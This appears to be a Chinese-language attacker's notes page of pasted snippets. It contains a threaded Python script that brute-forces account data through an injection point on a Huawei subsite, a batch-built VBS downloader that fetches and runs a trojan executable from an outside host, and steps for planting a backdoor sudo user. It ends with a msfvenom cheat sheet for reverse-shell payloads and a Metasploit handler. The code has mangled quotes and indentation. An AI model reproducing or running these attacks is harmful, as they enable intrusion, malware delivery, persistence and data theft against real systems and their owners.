#coding=utf8
import json
import threading,time
import gzip
import msgpack
import urllib
import urllib2
import tarfile

result = “”;
f = open(“data.txt”,”w”)
#MyThread.py线程类
class MyThread(threading.Thread):
def init(self, func, args=()):
super(MyThread, self).init()
self.func = func
self.args = args

def run(self):
time.sleep(2)
self.result = self.func(*self.args)

def get_result(self):
threading.Thread.join(self) # 等待线程执行完毕
try:
return self.result
except Exception:
return None

def request(surestr):#只发包
try:
url = “http://华为分站注入点/”
values = {“reason”:””,”coopAccount”:surestr, “activateType”:”p@sswordReset”}
#print “Test:”+surestr
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
res_data = urllib2.urlopen(req)
res = res_data.read()
if res_data.getcode() == 200:
return surestr+”|”+str(len(res))
except urllib2.HTTPError, err:
print(err.code)
print(err.read())
raise

def enum(surestr):#遍历发包,调整字符串
global result
enumchars = “qwertyuioplkjhgfdsazxcvbnm-_123456789.@()”
tp = []
if surestr == “*”:
surestr = “”
for chars in enumchars:
mt = MyThread(request, ((surestr+chars+”*”),))
#print “StartThread:request(“+surestr+chars+”*”+”)”
tp.append(mt)
mt.start()

flag = 0
for t in tp:
t.join()
retcode = t.get_result()
rc = retcode.split(‘|’)
if rc[1] != “53”:
print (“\rGot:”+rc[0]),
enum(rc[0].strip(‘*’))
flag = 1
else:
continue
if flag == 0:
print “\rComplete:”+surestr
result=result+surestr+”\n”

print enum(“*”)
f.write(result)
f.close()

echo Set Post = CreateObject(“Msxml2.XMLHTTP”) >>zl.vbs
echo Set Shell = CreateObject(“Wscript.Shell”) >>zl.vbs
echo Post.Open “GET”,”http://www.jbzj.com/muma.exe”,0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject(“ADODB.Stream”) >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile “c:\zl.exe”,2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run (“c:\zl.exe”) >>zl.vbs

权限维持

添加用户,非交互式设置密码并加入sudo组
adduser python32
echo python32:password|chpasswd
gpasswd -a username sudo
移动home目录:sudo usermod -d /path/to/new/home -m username

文件下载

tar -cvf log.tar log2012.log 仅打包,不压缩!
tar -zcvf log.tar.gz log2012.log 打包后,以 gzip 压缩
tar -jcvf log.tar.bz2 log2012.log 打包后,以 bzip2 压缩

python -m SimpleHTTPServer 8001

<?php
if (isset($_POST[“AAA”])){
echo “ISSET”;
}else{
echo “UNSET”;
}

这里要构造表单的
<form enctype="application/x-www-form-urlencoded" action="http://10.16.83.113/exec.php" method="POST">
<input type="text" name="radiobutton" value="homeway">
<input type="text" name="key" value="nokey">
<input type="submit" value="submit">
</form>

或者直接burp改,但是必须要Content-Type: application/x-www-form-urlencoded

List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘